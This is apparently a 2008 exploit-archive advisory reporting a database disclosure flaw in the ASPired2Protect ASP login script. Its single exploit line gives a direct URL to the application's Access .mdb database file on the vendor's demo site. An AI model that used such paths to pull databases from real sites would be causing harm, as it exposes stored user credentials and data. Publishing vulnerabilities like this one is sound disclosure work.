id: 4423
date: 12/12/2008
title: The Net Guys ASPired2Protect Database Disclosure Vulnerability
author: AlpHaNiX
cves: 

==============================================================
The Net Guys ASPired2Protect Database Disclosure Vulnerability
==============================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : ASPired2Protect
#download : http://thenetguys.us/Downloads/ASP2Protect.zip
#Demo     : http://thenetguys.us/ASPired2/Protect/login.asp


###########################################################################

#Exploits :

--=[DATABASE DISCLOSURE]=--
http://thenetguys.us/ASPired2/Protect/ASPired2Protect.mdb



###########################################################################



#  0day.today [2023-03-26]  #